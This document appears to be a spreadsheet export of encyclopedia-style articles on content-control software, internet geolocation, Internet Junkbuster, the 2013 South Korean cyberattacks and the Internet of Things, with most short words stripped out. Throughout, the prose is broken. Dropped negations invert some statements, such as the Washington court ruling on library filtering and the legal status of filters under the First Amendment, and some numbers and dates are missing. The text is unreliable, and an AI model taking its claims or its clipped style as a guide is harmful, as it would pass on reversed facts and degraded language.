software include data loss prevention functionality filter outbound well inbound information. users subject access policy defined institution. filtering customized, school district's high school library different filtering profile district's junior high school library.dns-based filtering this type filtering implemented layer attempts prevent lookups domains within policies (either parental control company rules). multiple free public services offer filtering options part services. sinkholes pi-hole also used purpose, though client-side only.search-engine filters many search engines, google bing offer users option turning safety filter. when safety filter activated, filters inappropriate links search results. users know actual website features explicit adult content, ability access content without using search engine. some providers offer child-oriented versions engines permit children friendly websites. reasons filtering internet intrinsically provide content blocking, therefore much content internet considered unsuitable children, given much content given certifications suitable adults only, e.g. 18-rated games movies. internet service providers (isps) block material containing pornography, controversial religious, political, news-related content route often utilized parents permit children access content conforming personal beliefs. content filtering software can, however, also used block malware content contains hostile, intrusive, annoying material including adware, spam, computer viruses, worms, trojan horses, spyware. most content control software marketed organizations parents. however, also marketed occasion facilitate self-censorship, example people struggling addictions online pornography, gambling, chat rooms, etc. self-censorship software also utilised order avoid viewing content consider immoral, inappropriate, simply distracting. number accountability software products marketed self-censorship accountability software. these often promoted religious media religious gatherings. criticism filtering errors overblocking utilizing filter overly zealous filtering content, mislabels content intended censored result blocking, over-censoring. over blocking filter material acceptable filtering policy effect, example health related information unintentionally filtered along porn-related material scunthorpe problem. filter administrators prefer side caution accepting blocking prevent risk access sites determine undesirable. content-control software mentioned blocking access beaver college name change arcadia university. another example filtering horniman museum. well, over-blocking encourage users bypass filter entirely. underblocking whenever information uploaded internet, filters block, under-censor, content parties responsible maintaining filters update quickly accurately, blacklisting rather whitelisting filtering policy place. morality opinion many would satisfied government filtering viewpoints moral political issues, agreeing could become support propaganda. many would also find unacceptable isp, whether isp's choice, deploy software without allowing users disable filtering connections. united states, first amendment united states constitution cited calls criminalise forced internet censorship. (see section below) legal actions 1998, united states federal district court virginia ruled (loudoun board trustees loudoun county library) imposition mandatory filtering public library violates first amendment.in 1996 congress passed communications decency act, banning indecency internet. civil liberties groups challenged first amendment, 1997 supreme court ruled favor. part civil liberties argument, especially groups like electronic frontier foundation, parents wanted block sites could content-filtering software, making government involvement unnecessary.in late 1990s, groups censorware project began reverse-engineering content-control software decrypting blacklists determine kind sites software blocked. this legal action alleging violation "cyber patrol" license agreement. they discovered tools routinely blocked unobjectionable sites also failing block intended targets. some content-control software companies responded claiming filtering criteria backed intensive manual checking. companies' opponents argued, hand, performing necessary checking would require resources greater companies possessed therefore claims valid.the motion picture association successfully obtained ruling enforcing isps content-control software prevent copyright infringement subscribers. religious, anti-religious, political censorship many types content-control software shown block sites based religious political leanings company owners. examples include blocking several religious sites (including site vatican), many political sites, homosexuality-related sites. x-stop shown block sites quaker site, national journal sexual orientation law, heritage foundation, parts ethical spectacle. cybersitter blocks sites like national organization women. nancy willard, academic researcher attorney, pointed many u.s. public schools libraries filtering software many christian organizations use. cyber patrol, product developed anti-defamation league mattel's learning company, found block political sites deems engaging 'hate speech' also human rights sites, amnesty international's page israel gay-rights sites, glaad.org. content labeling content labeling considered another form content-control software. 1994, internet content rating association (icra) part family online safety institute developed content rating system online content providers. using online questionnaire webmaster describes nature content. small file generated contains condensed, computer readable digest description used content filtering software block allow site. icra labels come variety formats. these include world wide consortium's resource description framework (rdf) well platform internet content selection (pics) labels used microsoft's internet explorer content advisor.icra labels example self-labeling. similarly, 2006 association sites advocating child protection (asacp) initiated restricted adults self-labeling initiative. asacp members concerned various forms legislation proposed united states going effect forcing adult companies label content. label, unlike icra labels, require webmaster fill questionnaire sign use. like icra label free. both labels recognized wide variety content-control software. voluntary content rating (vcr) system devised solid software cybersitter filtering software, alternative pics system, critics deemed complex. employs html metadata tags embedded within page documents specify type content contained document. only levels specified, mature adult, making specification extremely simple. public libraries australia australian internet safety advisory body information "practical advice internet safety, parental control filters protection children, students families" also includes public libraries.netalert, software made available free charge australian government, allegedly cracked 16-year-old student, wood, less week release august 2007. wood supposedly bypassed million filter half hour highlight problems government's approach internet content filtering.the australian government introduced legislation requires isp's "restrict access restricted content (commercial ma15+ content r18+ content) either hosted australia provided australia" commence january 2008, known cleanfeed.cleanfeed proposed mandatory level content filtration system. proposed beazley australian labor party opposition 2006 press release, intention protecting children vulnerable claimed parental computer illiteracy. announced december 2007 policy implemented rudd government, initial tests tasmania produced 2008 report. cleanfeed funded current budget, moving towards expression interest live testing isps 2008. public opposition criticism emerged, gaining irregular mainstream media attention, majority australians reportedly "strongly against" implementation. criticisms include expense, inaccuracy impossible ensure illegal sites blocked) fact compulsory, seen intrusion free speech rights. another major criticism point although filter claimed stop certain materials, underground rings dealing materials affected. filter might also provide false sense security parents, might supervise children less using internet, achieving exact opposite effect. cleanfeed responsibility senator conroy's portfolio. denmark denmark stated policy "prevent inappropriate internet sites accessed children's libraries across denmark". "'it important every library country opportunity protect children pornographic material using library computers. main priority culture minister make sure children surf safely libraries,' states brian mikkelsen press-release danish ministry culture." united kingdom many libraries british library local authority public libraries apply filters internet access. according research conducted radical librarians collective, least public libraries apply filters; including categories "lgbt interest", "abortion" "questionable". some public libraries block payday loan websites united states internet filters content-control software varies widely public libraries united states, since internet policies established local library board. many libraries adopted internet filters congress conditioned receipt universal service discounts internet filters children's internet protection (cipa). other libraries install content control software, believing acceptable policies educational efforts address issue children accessing age-inappropriate content preserving adult users' right freely access information. some libraries internet filters computers used children only. some libraries employ content-control software allow software deactivated case-by-case basis application librarian; libraries subject cipa required policy allows adults request filter disabled without explain reason request. many legal scholars believe number legal cases, particular reno american civil liberties union, established content-control software libraries violation first amendment. children's internet protection [cipa] june 2003 case united states american library association found cipa constitutional condition placed receipt federal funding, stating first amendment concerns dispelled law's provision allowed adult library users filtering software disabled, without explain reasons request. plurality decision left open future "as-applied" constitutional challenge, however. november 2006, lawsuit filed north central regional library district (ncrl) washington state policy refusing disable restrictions upon requests adult patrons, cipa challenged matter. 2010, washington state supreme court provided opinion asked certify question referred united states district court eastern district washington: "whether public library, consistent article washington constitution, filter internet access patrons without disabling sites containing constitutionally-protected speech upon request adult library patron." washington state supreme court ruled ncrl's internet filtering policy violate article section washington state constitution. court said: appears ncrl's filtering policy reasonable accords mission policies viewpoint neutral. appears article section content-based violation exists case. ncrl's essential mission promote reading lifelong learning. ncrl maintains, reasonable impose restrictions internet access order maintain environment conducive study contemplative thought." case returned federal court. march 2007, virginia passed similar cipa requires public libraries receiving state funds content-control software. like cipa, requires libraries disable filters adult library user requested user. bypassing filters content filtering general bypassed entirely tech-savvy individuals." blocking content device "[will not]…guarantee users eventually able find around filter."some software bypassed successfully using alternative protocols telnet https, conducting searches different language, using proxy server circumventor psiphon. also cached pages returned google searches could bypass controls well. syndication services provide alternate paths content. some poorly designed programs shut killing processes: example, microsoft windows windows task manager, using force quit activity monitor. numerous workarounds counters workarounds content-control software creators exist. google services often blocked filters, often bypassed using https:// place http:// since content filtering software able interpret content secure connections case ssl). encrypted used means bypassing content control software, especially content control software installed internet gateway firewall. other ways bypass content control filter include translation sites establishing remote connection uncensored device. products services some isps offer parental control options. some offer security software includes parental controls. v10.4 offers parental controls several applications (mail, finder, ichat, safari dictionary). microsoft's windows vista operating system also includes content-control software. content filtering technology exists major forms: application gateway packet inspection. http access application gateway called web-proxy proxy. such web-proxies inspect initial request returned page using arbitrarily complex rules return part page requester decision made. addition make substitutions whole part returned result. packet inspection filters initially interfere connection server inspect data connection goes past, point filter decide connection filtered disconnect injecting tcp-reset similar faked packet. techniques used together packet filter monitoring link sees http connection starting address content needs filtering. packet filter redirects connection web-proxy perform detailed filtering website without pass unfiltered connections. this combination quite popular significantly reduce cost system. gateway-based content control software difficult bypass desktop software user physical access filtering device. however, many techniques bypassing filters section still work. also adultism filtering comparison content-control software providers (incl. parental control software) computer network surveillance david burt, former librarian advocate content-control software deep content inspection egress filtering, control outbound network traffic financial coalition against child pornography internet censorship internet censorship circumvention internet safety opposition pornography parental controls peacefire, u.s.-based website dedicated "preserving first amendment rights internet users, particularly younger russian state duma bill 89417-6 proposed bill would mandate content control software wordfilter, generic name scripts typically used internet forums chat rooms automatically scans users' posts comments submitted automatically changes censors particular words phrases references</t>
  </si>
  <si>
    <t>Internet geolocation</t>
  </si>
  <si>
    <t>computing, internet geolocation software capable deducing geographic position device connected internet. example, device's address used determine country, city, code, determining geographical location. other methods include examination wi-fi hotspots, address, image metadata, credit card information. data sources address assigned device (e.g. computer, printer) participating computer network uses internet protocol communication. protocol specifies packet must header contains, among things, address sender. there number free paid subscription geolocation databases, ranging country level state city—including zip/post code level—each varying claims accuracy (generally higher country level). these databases typically contain address data used firewalls, servers, routing, mail systems, sites, automated systems geolocation useful. alternative hosting querying database obtain country code given address dnsbl-style lookup remote server.some commercial databases augmented geolocation software demographic data enable demographic-type targeting using address data.the primary source address data regional internet registries allocate distribute addresses amongst organizations located respective service regions: african network information centre (afrinic) american registry internet numbers (arin) asia-pacific network information centre (apnic) latin american caribbean internet address registry (lacnic) ripe network coordination centre (ripe ncc)secondary sources include: data mining user-submitted geographic location data: website-submitted, e.g. weather website asking visitors city name find local forecast pairing user's address address information account profile. wi-fi positioning system examination neighborhood wi-fi bssid. e.g. mozilla location service. examination neighborhood bluetooth devices. pairing user's address location device that's using address. data contributed internet service providers. guesstimates adjacent class range and/or gleaned network hops. network routing information collected point address. analysis linguistic data device, using pretrained models show term frequently mentioned certain location (e.g. "the "the "the subway").accuracy improved data scrubbing filter identify anomalies. statistical analysis user submitted data. utilizing third-party tests conducted reputable organizations. errors geolocation software maps addresses associated entire county territory particular location, geographic center territory, cause considerable problems people happen live there, enforcement authorities others mistakenly assume crimes misconduct associated address originate particular location. example, farmstead northeast potwin, kansas became default site million addresses massachusetts-based digital mapping company maxmind changed putative geographic center contiguous united states 39.8333333,-98.585522 38.0000,-97.0000. since 2012, family pretoria, south africa, regularly visited police angry private citizens believed stolen phones found family's backyard. this also result geolocation maxmind. company used national geospatial-intelligence agency's coordinates pretoria, pointed family's house, represent addresses associated pretoria. privacy distinction made co-operative oppositional geolocation. cases, interest users accurately located, example, offered information relevant location. cases, users prefer disclose location privacy reasons.technical measures ensuring anonymity, proxy servers, used circumvent restrictions imposed geolocation software. some sites detect proxies anonymizers, either block service provide non-localized content response. applications geolocation technology development since 1999, first patents granted 2004. technology already widely used multiple industries, including e-retail, banking, media, telecommunications, education, travel, hospitality, entertainment, health care, online gaming enforcement, preventing online fraud, complying regulations, managing digital rights serving targeted marketing content pricing. additionally, u.s. federal communications commission (fcc) proposed geolocation software might leveraged support 9-1-1 location determination.an address related unique also investigated basic functions, typing keyboard instructions: ping traceroute. unix-like systems, available command line tool. way, microsoft windows prompt working instructions. criminal investigations banks, software vendors online enterprises elsewhere became subject strict "know customer" laws imposed patriot act, bank secrecy act, treasury department's office foreign assets control regulatory entities europe early twenty-first century. these laws intended prevent money laundering, trafficking terrorist organizations, trading banned nations. when possible identify true location online visitors, geolocation protect banks participating transfer funds illicit purposes. more prosecuting bodies bringing cases involving cyber-crimes cyber-stalking identity theft. prosecutors often capability determining address data necessary link computer crime. fraud detection online retailers payment processors geolocation detect possible credit card fraud comparing user's location billing address account shipping address provided. mismatch order placed account number tokyo, example strong indicator potential fraud. address geolocation also used fraud detection match billing address postal code area code. banks prevent "phishing" attacks, money laundering security breaches determining user's location part authentication process. whois databases also help verify addresses registrants.government, enforcement corporate security teams geolocation investigatory tool, tracking internet routes online attackers find perpetrators prevent future attacks location. geomarketing since geolocation software information user location, companies using geomarketing provide content products famous useful specific location. advertisements content website uses geolocation software form (also referred api" address geolocation api") tailored provide information certain user wants. regional licensing internet movie vendors, online broadcasters serve live streaming video sporting events, certain music video sites licensed broadcast videos episodes/music videos permitted serve viewers licensed territories. geolocating viewers, certain obeying licensing regulations. online gambling websites must also know customers violate gambling laws, risk ramo, chief executive movie distributor movielink, said studios aware shortcomings going grown confident system shown work. gaming location-based game type pervasive game smartphones mobile devices gameplay evolves progresses player's real-world location typically obtained functionality device. also geo-blocking geotargeting navigation software location-based service address anonymization locator software personalization geolocation kinomap (geolocation video software) mobile phone tracking white space database (geolocation database) references external links computers software internet servers personalization curlie towards street-level client-independent geolocation: recent research paper explaining find location address within accurate geolocation get?</t>
  </si>
  <si>
    <t>Internet Junkbuster</t>
  </si>
  <si>
    <t>internet junkbuster proxy block cookies. developed junkbusters corporation released general public license. however, internet junkbuster updated since 1998 junkbusters.com site longer maintained. privoxy up-to-date filtering proxy based junkbuster code, much powerful. also proxomitron, windows-based filter. update dated november 2012: "sorry, junkbusters.com site longer maintained", says website. credit article contains material infoanarchy external links official website galactica proxy proxy shows state surfing realtime (based junkbuster, created 2001)</t>
  </si>
  <si>
    <t>June 25 cyber terror</t>
  </si>
  <si>
    <t>2013 major sets cyberattacks south korean targets attributed elements within north korea. march march 2013, three south korean television stations bank suffered frozen computer terminals suspected cyberwarfare. atms mobile payments also affected. south korean communications watchdog korea communications commission raised alert level cyber-attacks three scale five. north korea blamed similar attacks 2009 2011 suspected launching attack well. this attack also came period elevated tensions koreas, following pyongyang’s nuclear test february. south korean officials linked incident chinese address, increased suspicion north korea "[i]ntelligence experts believe north korea routinely uses chinese computer addresses hide cyber-attacks."the attacks organizations derived single entity. networks attacked malicious codes, rather distributed denial-of-service (ddos) attacks suspected beginning. appeared used hard drive overwrites. this cyberattack “damaged 32,000 computers servers media financial companies.” financial services commission south korea said shinhan bank reported internet banking servers temporarily blocked jeju bank nonghyup reported operations branches paralyzed computers infected viruses files erased. woori bank reported hacking attack, said suffered damage. computer shutdowns also companies including korean broadcasting system, munhwa broadcasting corporation, ytn.this cyberattack “caused us$750 million economic damage alone. (feakin 2013)” also, “[t]he frequency cyber attacks north korea rampant cyber espionage activities attributed china great concern south korean government. (lewis 2013)” june june cyber terror information leak occurred june 2013 targeted cheongwadae institutions. hacker caused incident admitted information million saenuri party members, thousand soldiers, thousand cheongwadae homepage users thousand united states forces korea members. there apparent hacking attacks government websites. incident happened 63rd anniversary start 1950-53 korean war, divided korean peninsula. since blue house’s website hacked, personal information total 220,000 people, including 100,000 ordinary citizens 20,000 military personnel, using “cheong dae” website hacked. website office government policy co-ordination media servers affected well. while multiple attacks organized multiple perpetrators, distributed denial-of-service (ddos) attacks south korean government websites directly linked “darkseoul” gang trojan.castov. malware related attack called "darkseoul" computer world first identified 2012. contributed multiple previous high-profile attacks south korea. timeline approximately 2013 june 9:10 websites cheongwadae website, main government institute websites, news, etc. became victims website change, ddos, information thievery attacks. when connecting cheongwadae homepage words 'the great jong-un governor' 'all hail unified chairman jong-un! until demands attacks continue. greet anonymous' would appear photo president park geun-hye. government changed status cyber danger 'noteworthy' june 10:45 changed 'warning' 3:40 cheongwadae uploaded apology june 28.the ministry science, future planning revealed july march june incidents corresponded past hacking methods used north korea. however, attacked targets include japanese korean central news agency site major north korean anti-south websites, hackers also announced would release information approximately high-ranked north korean army officers countless pieces information north korean weaponry. response following hacking june speculation north korea responsible attacks. investigators found address used attack matched used previous hacking attempts pyongyang.” park jae-moon, former director-general ministry science, future planning said, malignant codes [collected damaged devices] internet addresses used attack, well north korea's previous hacking patterns," proved "the hacking methods same" used march cyber attacks.with incident, korean government publicly announced would take charge “cyber terror response control tower” along different ministries, national intelligence service (nis) responsible build comprehensive response system using “national cyber security measures.”the south korean government asserted pyongyang link march cyberattacks, denied pyongyang. 50-year-old south korean identified suspected involved attack. appearance south korean national geographic south korean national geographic published cyber terror keywords 2013 attacks. also bureau lazarus group references</t>
  </si>
  <si>
    <t>Internet of Things</t>
  </si>
  <si>
    <t>internet things (iot) describes physical objects groups objects) sensors, processing ability, software, technologies connect exchange data devices systems internet communications networks. internet things considered misnomer devices need connected public internet, need connected network individually addressable.the field evolved convergence multiple technologies, including ubiquitous computing, commodity sensors, increasingly powerful embedded systems, machine learning. traditional fields embedded systems, wireless sensor networks, control systems, automation (including home building automation), independently collectively enable internet things. consumer market, technology synonymous products pertaining concept "smart home", including devices appliances (such lighting fixtures, thermostats, home security systems, cameras, home appliances) support common ecosystems, controlled devices associated ecosystem, smartphones smart speakers. also used healthcare systems.there number concerns risks growth technologies products, especially areas privacy security, consequently, industry governmental moves address concerns begun, including development international local standards, guidelines, regulatory frameworks. history main concept network smart devices discussed early 1982, modified coca-cola vending machine carnegie mellon university becoming first arpanet-connected appliance, able report inventory whether newly loaded drinks cold not. mark weiser's 1991 paper ubiquitous computing, "the computer 21st century", well academic venues ubicomp percom produced contemporary vision iot. 1994, reza raji described concept ieee spectrum "[moving] small packets data large nodes, integrate automate everything home appliances entire factories". between 1993 1997, several companies proposed solutions like microsoft's work novell's nest. field gained momentum bill envisioned device-to-device communication part "six webs" framework, presented world economic forum davos 1999.the concept "internet things" term itself, first appeared speech peter lewis, congressional black caucus foundation 15th annual legislative weekend washington, d.c, published september 1985. according lewis, "the internet things, iot, integration people, processes technology connectable devices sensors enable remote monitoring, status, manipulation evaluation trends devices." term "internet things" coined independently kevin ashton procter gamble, later mit's auto-id center, 1999, though prefers phrase "internet things". point, viewed radio-frequency identification (rfid) essential internet things, would allow computers manage individual things. main theme internet things embed short-range mobile transceivers various gadgets daily necessities enable forms communication people things, things themselves.in 2004 cornelius "pete" peterson, netsilicon, predicted that, "the next information technology dominated [iot] devices, networked devices ultimately gain popularity significance extent exceed number networked computers workstations." peterson believed medical devices industrial controls would become dominant applications technology.defining internet things "simply point time 'things objects' connected internet people", cisco systems estimated "born" 2008 2009, things/people ratio growing 0.08 2003 1.84 2010. applications extensive applications devices often divided consumer, commercial, industrial, infrastructure spaces. consumer applications growing portion devices created consumer use, including connected vehicles, home automation, wearable technology, connected health, appliances remote monitoring capabilities. smart home devices part larger concept home automation, include lighting, heating conditioning, media security systems camera systems. long-term benefits could include energy savings automatically ensuring lights electronics turned making residents home aware usage. smart home automated home could based platform hubs control smart devices appliances. instance, using apple's homekit, manufacturers home products accessories controlled application devices iphone apple watch. this could dedicated native applications siri. this demonstrated case lenovo's smart home essentials, line smart home devices controlled apple's home siri without need wi-fi bridge. there also dedicated smart home hubs offered standalone platforms connect different smart home products include amazon echo, google home, apple's homepod, samsung's smartthings hub. addition commercial systems, many non-proprietary, open source ecosystems; including home assistant, openhab domoticz. elder care application smart home provide assistance elderly individuals disabilities. these home systems assistive technology accommodate owner's specific disabilities. voice control assist users sight mobility limitations alert systems connected directly cochlear implants worn hearing-impaired users. they also equipped additional safety features, including sensors monitor medical emergencies falls seizures. smart home technology applied provide users freedom higher quality life.the term "enterprise iot" refers devices used business corporate settings. 2019, estimated eiot account billion devices. organizational applications medical healthcare internet medical things (iomt) application medical health related purposes, data collection analysis research, monitoring. iomt referenced "smart healthcare", technology creating digitized healthcare system, connecting available medical resources healthcare services.iot devices used enable remote health monitoring emergency notification systems. these health monitoring devices range blood pressure heart rate monitors advanced devices capable monitoring specialized implants, pacemakers, fitbit electronic wristbands, advanced hearing aids. some hospitals begun implementing "smart beds" detect occupied patient attempting also adjust ensure appropriate pressure support applied patient without manual interaction nurses. 2015 goldman sachs report indicated healthcare devices "can save united states $300 billion annual healthcare expenditures increasing revenue decreasing cost." moreover, mobile devices support medical follow-up creation 'm-health', used analyzed health statistics."specialized sensors also equipped within living spaces monitor health general well-being senior citizens, also ensuring proper treatment administered assisting people regain lost mobility therapy well. these sensors create network intelligent sensors able collect, process, transfer, analyze valuable information different environments, connecting in-home monitoring devices hospital-based systems. other consumer devices encourage healthy living, connected scales wearable heart monitors, also possibility iot. end-to-end health monitoring platforms also available antenatal chronic patients, helping manage health vitals recurring medication requirements.advances plastic fabric electronics fabrication methods enabled ultra-low cost, use-and-throw iomt sensors. these sensors, along required rfid electronics, fabricated paper e-textiles wireless powered disposable sensing devices. applications established point-of-care medical diagnostics, portability system-complexity essential.as 2018 iomt applied clinical laboratory industry, also healthcare health insurance industries. iomt healthcare industry permitting doctors, patients, others, guardians patients, nurses, families, similar, part system, patient records saved database, allowing doctors rest medical staff access patient information. moreover, iot-based systems patient-centered, involves flexible patient's medical conditions. iomt insurance industry provides access better types dynamic information. this includes sensor-based solutions biosensors, wearables, connected health devices, mobile apps track customer behavior. this lead accurate underwriting pricing models.the application healthcare plays fundamental role managing chronic diseases disease prevention control. remote monitoring made possible connection powerful wireless solutions. connectivity enables health practitioners capture patient's data applying complex algorithms health data analysis. transportation assist integration communications, control, information processing across various transportation systems. application extends aspects transportation systems (i.e. vehicle, infrastructure, driver user). dynamic interaction components transport system enables inter- intra-vehicular communication, smart traffic control, smart parking, electronic toll collection systems, logistics fleet management, vehicle control, safety, road assistance. communications vehicular communication systems, vehicle-to-everything communication (v2x), consists three main components: vehicle vehicle communication (v2v), vehicle infrastructure communication (v2i) vehicle pedestrian communications (v2p). first step autonomous driving connected road infrastructure. building home automation devices used monitor control mechanical, electrical electronic systems used various types buildings (e.g., public private, industrial, institutions, residential) home automation building automation systems. context, three main areas covered literature: integration internet building energy management systems order create energy-efficient iot-driven "smart buildings". possible means real-time monitoring reducing energy consumption monitoring occupant behaviors. integration smart devices built environment might used future applications. industrial applications also known iiot, industrial devices acquire analyze data connected equipment, operational technology (ot), locations, people. combined operational technology (ot) monitoring devices, iiot helps regulate monitor industrial systems. also, implementation carried automated record updates asset placement industrial storage units size assets vary small screw whole motor spare part, misplacement assets cause loss manpower time money. manufacturing connect various manufacturing devices equipped sensing, identification, processing, communication, actuation, networking capabilities. network control management manufacturing equipment, asset situation management, manufacturing process control allow used industrial applications smart manufacturing. intelligent systems enable rapid manufacturing optimization products, rapid response product demands.digital control systems automate process controls, operator tools service information systems optimize plant safety security within purview iiot. also applied asset management predictive maintenance, statistical evaluation, measurements maximize reliability. industrial management systems integrated smart grids, enabling energy optimization. measurements, automated controls, plant optimization, health safety management, functions provided networked sensors.in addition general manufacturing, also used processes industrialization construction. agriculture there numerous applications farming collecting data temperature, rainfall, humidity, wind speed, pest infestation, soil content. this data used automate farming techniques, take informed decisions improve quality quantity, minimize risk waste, reduce effort required manage crops. example, farmers monitor soil temperature moisture afar, even apply iot-acquired data precision fertilization programs. overall goal data sensors, coupled farmer's knowledge intuition farm, help increase farm productivity, also help reduce costs. august 2018, toyota tsusho began partnership microsoft create fish farming tools using microsoft azure application suite technologies related water management. developed part researchers kindai university, water pump mechanisms artificial intelligence count number fish conveyor belt, analyze number fish, deduce effectiveness water flow data fish provide. farmbeats project microsoft research uses white space connect farms also part azure marketplace now. maritime devices monitoring environments systems boats yachts. many pleasure boats left unattended days summer, months winter devices provide valuable early alerts boat flooding, fire, deep discharge batteries. global internet data networks sigfox, combined long-life batteries, microelectronics allows engine rooms, bilge, batteries constantly monitored reported connected android apple applications example. infrastructure applications monitoring controlling operations sustainable urban rural infrastructures like bridges, railway tracks offshore wind-farms application iot. infrastructure used monitoring events changes structural conditions compromise safety increase risk. benefit construction industry cost-saving, time reduction, better quality workday, paperless workflow increase productivity. help taking faster decisions save money real-time data analytics. also used scheduling repair maintenance activities efficient manner, coordinating tasks different service providers users facilities. devices also used control critical infrastructure like bridges provide access ships. usage devices monitoring operating infrastructure likely improve incident management emergency response coordination, quality service, up-times reduce costs operation infrastructure related areas. even areas waste management benefit automation optimization could brought iot. metropolitan scale deployments there several planned ongoing large-scale deployments iot, enable better management cities systems. example, songdo, south korea, first kind fully equipped wired smart city, gradually built, approximately percent business district completed june 2018. much city planned wired automated, little human intervention.another application currently undergoing project santander, spain. deployment, approaches adopted. this city 180,000 inhabitants already seen 18,000 downloads city smartphone app. connected 10,000 sensors enable services like parking search, environmental monitoring, digital city agenda, more. city context information used deployment benefit merchants spark deals mechanism based city behavior aims maximizing impact notification.other examples large-scale deployments underway include sino-singapore guangzhou knowledge city; work improving water quality, reducing noise pollution, increasing transportation efficiency jose, california; smart traffic management western singapore. using rpma (random phase multiple access) technology, diego-based ingenu built nationwide public network low-bandwidth data transmissions using unlicensed gigahertz spectrum wi-fi. ingenu's "machine network" covers third population across major cities including diego dallas. french company, sigfox, commenced building ultra narrowband wireless data network francisco area 2014, first business achieve deployment u.s. subsequently announced would total 4000 base stations cover total cities u.s. 2016, making largest network coverage provider country thus far. cisco also participates smart cities projects. cisco started deploying technologies smart wi-fi, smart safety security, smart lighting, smart parking, smart transports, smart stops, smart kiosks, remote expert government services (regs) smart education five area city vijaywada, india.another example large deployment completed york waterways york city connect city's vessels able monitor live 24/7. network designed engineered fluidmesh networks, chicago-based company developing wireless networks critical applications. nyww network currently providing coverage hudson river, east river, upper york bay. with wireless network place, waterway able take control fleet passengers previously possible. applications include security, energy fleet management, digital signage, public wi-fi, paperless ticketing others. energy management significant numbers energy-consuming devices (e.g. lamps, household appliances, motors, pumps, etc.) already integrate internet connectivity, allow communicate utilities balance power generation also helps optimize energy consumption whole. these devices allow remote control users, central management cloud-based interface, enable functions like scheduling (e.g., remotely powering heating systems, controlling ovens, changing lighting conditions etc.). smart grid utility-side application; systems gather energy power-related information improve efficiency production distribution electricity. using advanced metering infrastructure (ami) internet-connected devices, electric utilities collect data end-users, also manage distribution automation devices like transformers. environmental monitoring environmental monitoring applications typically sensors assist environmental protection monitoring water quality, atmospheric soil conditions, even include areas like monitoring movements wildlife habitats. development resource-constrained devices connected internet also means applications like earthquake tsunami early-warning systems also used emergency services provide effective aid. devices application typically span large geographic area also mobile. argued standardization brings wireless sensing revolutionize area.living another example integrating living integrates combines research innovation processes, establishing within public-private-people-partnership. there currently living labs collaborate share knowledge stakeholders co-create innovative technological products. companies implement develop services smart cities, need incentives. governments play roles smart city projects changes policies help cities implement provides effectiveness, efficiency, accuracy resources used. instance, government provides incentives cheap rent, improves public transports, offers environment start-up companies, creative industries, multinationals co-create, share common infrastructure labor markets, take advantage locally embedded technologies, production process, transaction costs. relationship technology developers governments manage city's assets, provide open access resources users efficient way. military applications internet military things (iomt) application technologies military domain purposes reconnaissance, surveillance, combat-related objectives. heavily influenced future prospects warfare urban environment involves sensors, munitions, vehicles, robots, human-wearable biometrics, smart technology relevant battlefield. internet battlefield things internet battlefield things (iobt) project initiated executed u.s. army research laboratory (arl) focuses basic science related enhance capabilities army soldiers. 2017, launched internet battlefield things collaborative research alliance (iobt-cra), establishing working collaboration industry, university, army researchers advance theoretical foundations technologies applications army operations. ocean things ocean things project darpa-led program designed establish internet things across large ocean areas purposes collecting, monitoring, analyzing environmental vessel activity data. project entails deployment 50,000 floats house passive sensor suite autonomously detect track military commercial vessels part cloud-based network. product digitalization there several applications smart active packaging code affixed product packaging. passive, however, contains unique identifier (typically url) enables user access digital content product smartphone. strictly speaking, passive items part internet things, seen enablers digital interactions. term "internet packaging" coined describe applications unique identifiers used, automate supply chains, scanned large scale consumers access digital content. authentication unique identifiers, thereby product itself, possible copy-sensitive digital watermark copy detection pattern scanning scanning code, tags encrypt communication. trends characteristics iot's major significant trend recent years explosive growth devices connected controlled internet. wide range applications technology mean specifics different device next basic characteristics shared most. creates opportunities direct integration physical world computer-based systems, resulting efficiency improvements, economic benefits, reduced human exertions.the number devices increased year-over-year billion year 2017 estimated billion devices 2020. global market value projected reach $7.1 trillion 2020. intelligence ambient intelligence autonomous control part original concept internet things. ambient intelligence autonomous control necessarily require internet structures, either. however, shift research companies intel) integrate concepts autonomous control, initial outcomes towards direction considering objects driving force autonomous iot. promising approach context deep reinforcement learning systems provide dynamic interactive environment. training agent (i.e., device) behave smartly environment cannot addressed conventional machine learning algorithms supervised learning. reinforcement learning approach, learning agent sense environment's state (e.g., sensing home temperature), perform actions (e.g., turn hvac off) learn maximizing accumulated rewards receives long term. intelligence offered three levels: devices, edge/fog nodes, cloud computing. need intelligent control decision level depends time sensitiveness application. example, autonomous vehicle's camera needs make real-time obstacle detection avoid accident. this fast decision making would possible transferring data vehicle cloud instances return predictions back vehicle. instead, operation performed locally vehicle. integrating advanced machine learning algorithms including deep learning devices active research area make smart objects closer reality. moreover, possible value deployments analyzing data, extracting hidden information, predicting control decisions. wide variety machine learning techniques used domain ranging traditional methods regression, support vector machine, random forest advanced ones convolutional neural networks, lstm, variational autoencoder.in future, internet things non-deterministic open network auto-organized intelligent entities (web services, components) virtual objects (avatars) interoperable able independently (pursuing objectives shared ones) depending context, circumstances environments. autonomous behavior collection reasoning context information well object's ability detect changes environment (faults affecting sensors) introduce suitable mitigation measures constitutes major research trend, clearly needed provide credibility technology. modern products solutions marketplace variety different technologies support context-aware automation, sophisticated forms intelligence requested permit sensor units intelligent cyber-physical systems deployed real environments. architecture system architecture, simplistic view, consists three tiers: tier devices, tier edge gateway, tier cloud. devices include networked things, sensors actuators found equipment, particularly protocols modbus, bluetooth, zigbee, proprietary protocols, connect edge gateway. edge gateway layer consists sensor data aggregation systems called edge gateways provide functionality, pre-processing data, securing connectivity cloud, using systems websockets, event hub, and, even cases, edge analytics computing. edge gateway layer also required give common view devices upper layers facilitate easier management. final tier includes cloud application built using microservices architecture, usually polyglot inherently secure nature using https/oauth. includes various database systems store sensor data, time series databases asset stores using backend data storage systems (e.g. cassandra, postgresql). cloud tier cloud-based system features event queuing messaging system handles communication transpires tiers. some experts classified three-tiers system edge, platform, enterprise connected proximity network, access network, service network, respectively.building internet things, things architecture application layer internet things looking convergence data devices applications create innovative use-cases. order program control flow information internet things, predicted architectural direction called everywhere blending traditional process management process mining special capabilities automate control large numbers coordinated devices. network architecture internet things requires huge scalability network space handle surge devices. ietf 6lowpan would used connect devices networks. with billions devices added internet space, ipv6 play major role handling network layer scalability. ietf's constrained application protocol, zeromq, mqtt would provide lightweight data transport. computing viable alternative prevent large burst data flow internet. edge devices' computation power analyse process data extremely limited. limited processing power attribute devices purpose supply data physical objects remaining autonomous. heavy processing requirements battery power harming iot's ability operate. scalability easy devices simply supply data internet server sufficient processing power. decentralized decentralized internet things, decentralized iot, modified iot. utilizes computing handle balance requests connected devices order reduce loading cloud servers, improve responsiveness latency-sensitive applications like vital signs monitoring patients, vehicle-to-vehicle communication autonomous driving, critical failure detection industrial devices.conventional connected mesh network major head node (centralized 